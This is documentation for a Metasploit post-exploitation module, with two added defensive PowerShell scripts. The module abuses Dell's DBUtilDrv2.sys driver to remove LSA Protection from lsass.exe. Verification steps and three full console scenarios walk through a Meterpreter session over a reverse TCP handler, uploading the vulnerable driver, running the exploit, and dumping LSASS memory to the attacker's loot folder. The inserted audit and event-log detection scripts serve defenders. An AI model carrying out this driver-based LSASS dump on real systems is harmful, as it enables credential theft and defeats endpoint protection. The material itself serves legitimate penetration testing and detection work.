metasploit-gs/documentation/modules/post/windows/manage/dell_memory_protect.md
2023-10-10 14:46:18 -04:00

Vulnerable Application

The Dell driver dbutil_2_3.sys was affected by a local privilege escalation issue due to a write-what-where condition exposed by a few of the driver's IOCTLs. This was assigned CVE-2021-21551. Dell "fixed" this issue by deprecating dbutil_2_3.sys and switching to DBUtilDrv2.sys. The new driver prevents low privileged users from interacting with the driver but did not fix the write-what-where condition.

This module leverages the write-what-where condition in DBUtilDrv2.sys version 2.5 or 2.7 to disable or enable LSA Protection on a given PID (assuming the system is configured for LSA Protection). This allows, for example, dumping LSASS memory even when Secure Boot and RunAsPPL are enabled, or preventing antivirus from accessing the memory of a chosen process.

The Dell drivers are not distributed with Metasploit. The user must truly bring their own vulnerable driver (BYOVD) and upload the driver and installation files to the target system themselves. The module will install, exploit, and remove the driver. Both installing the driver and dumping memory require high privileged accounts. The following are the required files per version and their hashes:

dbutildrv2.sys version 2.5

dbutildrv2.sys version 2.7

See scenarios below for an example.

Supported Targets

  • Windows 10 x64 v1507 - v19044 (21H2)
  • Windows 11 x64 21H2
  • Windows Server 2016 x64 v1607 - v1709
  • Windows Server 2019 x64 v1909 - v2009 (20H2)

The targets must have UEFI or Secure Boot enabled and the RunAsPPL registry key should be configured.
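The prerequisites above (Secure Boot or UEFI plus a configured RunAsPPL value) are exactly the configuration this module defeats, so from the defender's side the useful check is not only "is LSA Protection on?" but also "is either Dell driver already present on the host?". The following PowerShell audit is an added example and is not part of the Metasploit module or its documentation. It uses only standard Windows cmdlets and the documented RunAsPPL value under the Lsa key; the driver file names come from the text above, and the directories swept for a dropped driver file are an assumption that can be extended. Run it from an elevated prompt, since Confirm-SecureBootUEFI requires administrative rights.

```powershell
# Added example, not part of the dell_memory_protect module.
# Reports whether this host matches the module's prerequisites and whether a
# DBUtil driver (dbutil_2_3.sys or DBUtilDrv2.sys) is installed as a service or
# lying around as a loose file. Run from an elevated PowerShell prompt.

function Get-LsaProtectionPosture {
    [CmdletBinding()]
    param(
        # Assumed sweep locations for a dropped driver file; extend to suit.
        [string[]]$ScanPaths = @("$env:SystemRoot\Temp", "$env:SystemRoot\System32\drivers")
    )

    # RunAsPPL lives under the Lsa key. $null means it was never set; any nonzero
    # value enables LSA Protection (1 is the classic UEFI-locked setting).
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction Stop
    $runAsPpl = $lsa.RunAsPPL

    # Confirm-SecureBootUEFI throws on legacy-BIOS machines; treat that as "off".
    try { $secureBoot = Confirm-SecureBootUEFI } catch { $secureBoot = $false }

    # Any driver service whose image is one of the two Dell drivers, running or not.
    $driverPattern = '(?i)dbutil_2_3\.sys|dbutildrv2\.sys'
    $services = Get-CimInstance -ClassName Win32_SystemDriver |
        Where-Object { $_.PathName -match $driverPattern } |
        Select-Object Name, State, StartMode, PathName

    # Loose driver files with their file version; 2.5 and 2.7 of DBUtilDrv2.sys
    # are the versions the module exploits.
    $files = Get-ChildItem -Path $ScanPaths -Filter 'dbutil*.sys' -File -ErrorAction SilentlyContinue |
        Select-Object FullName, @{ Name = 'FileVersion'; Expression = { $_.VersionInfo.FileVersion } }

    [pscustomobject]@{
        Computer        = $env:COMPUTERNAME
        RunAsPPL        = $runAsPpl
        SecureBoot      = $secureBoot
        # The configuration this module is written against: PPL on and Secure Boot on.
        LsaPplExpected  = ($null -ne $runAsPpl -and $runAsPpl -ne 0 -and $secureBoot)
        DellDriverSvcs  = $services
        DellDriverFiles = $files
    }
}

$posture = Get-LsaProtectionPosture
$posture | Format-List

if ($posture.DellDriverSvcs -or $posture.DellDriverFiles) {
    # The driver carries a valid Dell signature, so Secure Boot and signature
    # enforcement will not reject it; it has to be blocked by name/hash and removed.
    Write-Warning 'DBUtil driver present on this host: remove it and enforce a driver blocklist (e.g. Microsoft vulnerable driver block rules) so it cannot be reloaded.'
}
```

A host that reports LsaPplExpected as true is protected against ordinary handle-based LSASS access but not against this module, which is why the driver sweep matters more than the registry value. Because the module installs and then removes the driver, a clean sweep at audit time does not prove the driver was never loaded; that gap is what event-log hunting (service installation and driver load events) covers.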

Options

DRIVER_PATH

The path on the RHOST containing the driver inf, cat, and sys (and coinstaller depending on the version). For example, in the scenarios below, the driver files are uploaded to C:\Windows\Temp, so this is configured with set DRIVER_PATH C:\\Windows\\Temp.

ENABLE_MEM_PROTECT

Enable or disable memory protection on the targeted process. false will remove memory protection and true will enable it.

PID

The ID of the targeted process. If set to 0 (the default value), the module will automatically find lsass.exe.

Verification Steps

  1. Start msfconsole
  2. Get a system Meterpreter session on a host using UEFI or Secure Boot and configured with RunAsPPL.
  3. Obtain the pid of lsass.exe: ps | grep lsass
  4. Background the session
  5. Do: use post/windows/gather/memory_dump
  6. Set the SESSION, PID, and DUMP_PATH options.
  7. Do: run
  8. Observe a permission denied error.
  9. Return to the previous session: sessions -i 1
  10. Upload the required driver files: upload /home/albinolobster/drivers/2_7/ C:\\Windows\\Temp\\
  11. Background the session
  12. Do: use post/windows/manage/dell_memory_protect
  13. Set the SESSION, PID, and DRIVER_PATH (e.g. C:\\Windows\\Temp) options.
  14. Do: run
  15. Observe the module exits successfully.
  16. Do: use post/windows/gather/memory_dump
  17. Do: run
  18. Observe the successful memory dump of lsass
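Steps 10 through 15 necessarily leave two host artefacts even though the module removes the driver afterwards: the Service Control Manager records a new kernel-driver service (System log, Event ID 7045) and, where Sysmon is deployed, the driver load itself is recorded (Sysmon Event ID 6). The PowerShell below is an added detection example and is not part of the module or its documentation. It assumes the objects it filters have the Id, ProviderName, TimeCreated and Message members that Get-WinEvent returns; the sample records are constructed here to mirror the scenarios on this page (the hash in the Sysmon sample is a placeholder, since the page does not list the driver hashes), and live use replaces them with Get-WinEvent output as shown in the comments.

```powershell
# Added example, not part of the dell_memory_protect module.
# Flags the installation or loading of either Dell DBUtil driver from
# Windows event records, regardless of which directory it was loaded from.

# Matches the two driver file names named in the module text, as path tails.
$DellDriverPattern = '(?i)\\(dbutil_2_3|dbutildrv2)\.sys$'

function Find-DellDriverActivity {
    param(
        # One event record per pipeline item (shape of Get-WinEvent output).
        [Parameter(ValueFromPipeline)] $Record
    )
    process {
        switch ($Record.Id) {
            7045 {
                # SCM 7045 messages carry "Service File Name: <path>" for kernel drivers too.
                if ($Record.Message -match 'Service File Name:\s*(?<path>\S+)') {
                    $path = $Matches.path
                    if ($path -match $DellDriverPattern) {
                        [pscustomobject]@{ Time = $Record.TimeCreated; Source = 'SCM 7045'; Path = $path; Finding = 'Dell DBUtil driver service installed' }
                    }
                }
            }
            6 {
                # Sysmon DriverLoad events carry "ImageLoaded: <path>".
                if ($Record.ProviderName -eq 'Microsoft-Windows-Sysmon' -and $Record.Message -match 'ImageLoaded:\s*(?<path>\S+)') {
                    $path = $Matches.path
                    if ($path -match $DellDriverPattern) {
                        [pscustomobject]@{ Time = $Record.TimeCreated; Source = 'Sysmon 6'; Path = $path; Finding = 'Dell DBUtil driver loaded' }
                    }
                }
            }
        }
    }
}

# Live use (the sample records below stand in for these two queries):
#   Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } | Find-DellDriverActivity
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 6 } | Find-DellDriverActivity

# Constructed sample records modelled on the Windows 11 scenario on this page.
$SampleRecords = @(
    [pscustomobject]@{
        Id = 7045; ProviderName = 'Service Control Manager'; TimeCreated = [datetime]'2021-12-07T12:50:10'
        Message = "A service was installed in the system.`r`n`r`nService Name: DBUtilDrv2`r`nService File Name: C:\Windows\System32\drivers\DBUtilDrv2.sys`r`nService Type: kernel mode driver`r`nService Start Type: demand start`r`nService Account: "
    },
    [pscustomobject]@{
        # Benign control record: a normal in-box driver must not be flagged.
        Id = 7045; ProviderName = 'Service Control Manager'; TimeCreated = [datetime]'2021-12-07T12:50:11'
        Message = "A service was installed in the system.`r`n`r`nService Name: mup`r`nService File Name: C:\Windows\System32\drivers\mup.sys`r`nService Type: kernel mode driver`r`nService Start Type: system start`r`nService Account: "
    },
    [pscustomobject]@{
        # Note the valid Dell signature: signature checks alone will not catch BYOVD.
        Id = 6; ProviderName = 'Microsoft-Windows-Sysmon'; TimeCreated = [datetime]'2021-12-07T12:50:12'
        Message = "Driver loaded:`r`nRuleName: -`r`nUtcTime: 2021-12-07 20:50:12.000`r`nImageLoaded: C:\Windows\System32\drivers\DBUtilDrv2.sys`r`nHashes: SHA256=<placeholder-not-from-page>`r`nSigned: true`r`nSignature: Dell Inc.`r`nSignatureStatus: Valid"
    }
)

$SampleRecords | Find-DellDriverActivity | Format-Table -AutoSize
```

Run against the sample records, the function returns the two DBUtilDrv2 entries and skips the mup.sys control record. Matching on the file name tail rather than a fixed directory matters because the module takes the driver from whatever DRIVER_PATH the operator chose; in production, pair the name match with the file hashes of the known-vulnerable versions and with a driver blocklist, since the driver's Dell signature is valid and will not trip signature-based controls.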

Scenarios

Windows 11 Build 22000.348 x64 using DBUtilDrv2 version 2.7

[*] Started reverse TCP handler on 10.0.0.9:1270 
[*] Meterpreter session 1 opened (10.0.0.9:1270 -> 10.0.0.8:47730 ) at 2021-12-07 12:48:57 -0800

meterpreter > sysinfo
Computer        : BADBLOOD
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: badblood\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User  Path
 ---  ----  ----       ----  -------  ----  ----
 740  572   lsass.exe  x64   0

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > options

Module options (post/windows/gather/memory_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DUMP_PATH                   yes       File to write memory dump to
   DUMP_TYPE  standard         yes       Minidump size (Accepted: standard, full)
   PID                         yes       ID of the process to dump memory from
   SESSION                     yes       The session to run this module on

msf6 post(windows/gather/memory_dump) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/memory_dump) > set PID 740
PID => 740
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against BADBLOOD
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/albinolobster/drivers/2_7/ C:\\Windows\\Temp
[*] uploading  : /home/albinolobster/drivers/2_7/WdfCoInstaller01009.dll -> C:\Windows\Temp\WdfCoInstaller01009.dll
[*] uploaded   : /home/albinolobster/drivers/2_7/WdfCoInstaller01009.dll -> C:\Windows\Temp\WdfCoInstaller01009.dll
[*] uploading  : /home/albinolobster/drivers/2_7/DBUtilDrv2.cat -> C:\Windows\Temp\DBUtilDrv2.cat
[*] uploaded   : /home/albinolobster/drivers/2_7/DBUtilDrv2.cat -> C:\Windows\Temp\DBUtilDrv2.cat
[*] uploading  : /home/albinolobster/drivers/2_7/dbutildrv2.inf -> C:\Windows\Temp\dbutildrv2.inf
[*] uploaded   : /home/albinolobster/drivers/2_7/dbutildrv2.inf -> C:\Windows\Temp\dbutildrv2.inf
[*] uploading  : /home/albinolobster/drivers/2_7/DBUtilDrv2.sys -> C:\Windows\Temp\DBUtilDrv2.sys
[*] uploaded   : /home/albinolobster/drivers/2_7/DBUtilDrv2.sys -> C:\Windows\Temp\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect 
msf6 post(windows/manage/dell_memory_protect) > options

Module options (post/windows/manage/dell_memory_protect):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   DRIVER_PATH                          yes       The path containing the driver inf, cat, and sys (and coinstaller)
   ENABLE_MEM_PROTECT  false            yes       Enable or disable memory protection
   PID                                  yes       The targeted process
   SESSION                              yes       The session to run this module on

msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp
DRIVER_PATH => C:\Windows\Temp
msf6 post(windows/manage/dell_memory_protect) > set PID 740
PID => 740
msf6 post(windows/manage/dell_memory_protect) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Launching netsh to host the DLL...
[+] Process 692 launched.
[*] Reflectively injecting the DLL into 692...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump 
msf6 post(windows/gather/memory_dump) > options

Module options (post/windows/gather/memory_dump):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   DUMP_PATH  C:\Windows\Temp\lsass_dump  yes       File to write memory dump to
   DUMP_TYPE  standard                    yes       Minidump size (Accepted: standard, full)
   PID        740                         yes       ID of the process to dump memory from
   SESSION    1                           yes       The session to run this module on

msf6 post(windows/gather/memory_dump) > run

[*] Running module against BADBLOOD
[*] Dumping memory for lsass.exe
[*] Downloading minidump (4.11 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211207125102_default_172.16.144.11_windows.process._368616.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > 

Windows 10 Build 19044.1348 x64 using DBUtilDrv2 version 2.5

[*] Started reverse TCP handler on 10.0.0.9:1270 
[*] Meterpreter session 1 opened (10.0.0.9:1270 -> 10.0.0.8:39523 ) at 2021-12-08 07:18:27 -0800

meterpreter > sysinfo
Computer        : DESKTOP-JCD6JN8
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-JCD6JN8\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User  Path
 ---  ----  ----       ----  -------  ----  ----
 732  568   lsass.exe  x64   0

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/memory_dump) > set PID 732
PID => 732
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against DESKTOP-JCD6JN8
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/albinolobster/drivers/2_5/ C:\\Windows\\Temp\\
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploading  : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploaded   : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect 
msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp\\
DRIVER_PATH => C:\Windows\Temp\
msf6 post(windows/manage/dell_memory_protect) > set PID 732
PID => 732
msf6 post(windows/manage/dell_memory_protect) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Launching netsh to host the DLL...
[+] Process 3508 launched.
[*] Reflectively injecting the DLL into 3508...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump 
msf6 post(windows/gather/memory_dump) > run

[*] Running module against DESKTOP-JCD6JN8
[*] Dumping memory for lsass.exe
[*] Downloading minidump (5.93 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211208072121_default_172.16.144.6_windows.process._495675.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > 

Windows Server 2016 (10.0.14393) x64 using DBUtilDrv2 version 2.5 and PID option set to 0

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.8:45172 ) at 2021-12-18 04:12:03 -0800

meterpreter > sysinfo
Computer        : WIN-7ESIGFVFQEG
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-7ESIGFVFQEG\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User  Path
 ---  ----  ----       ----  -------  ----  ----
 664  504   lsass.exe  x64   0

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > set SESSIOn 1
SESSIOn => 1
msf6 post(windows/gather/memory_dump) > set PID 664
PID => 664
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against WIN-7ESIGFVFQEG
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/albinolobster/drivers/2_5/ C:\\Windows\\Temp\\
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploading  : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploaded   : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp\\
DRIVER_PATH => C:\Windows\Temp\
msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > run

[*] Set PID option 664 for lsass.exe
[*] Launching netsh to host the DLL...
[+] Process 3008 launched.
[*] Reflectively injecting the DLL into 3008...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against WIN-7ESIGFVFQEG
[*] Dumping memory for lsass.exe
[*] Downloading minidump (4.70 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211218041511_default_172.16.144.14_windows.process._536152.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >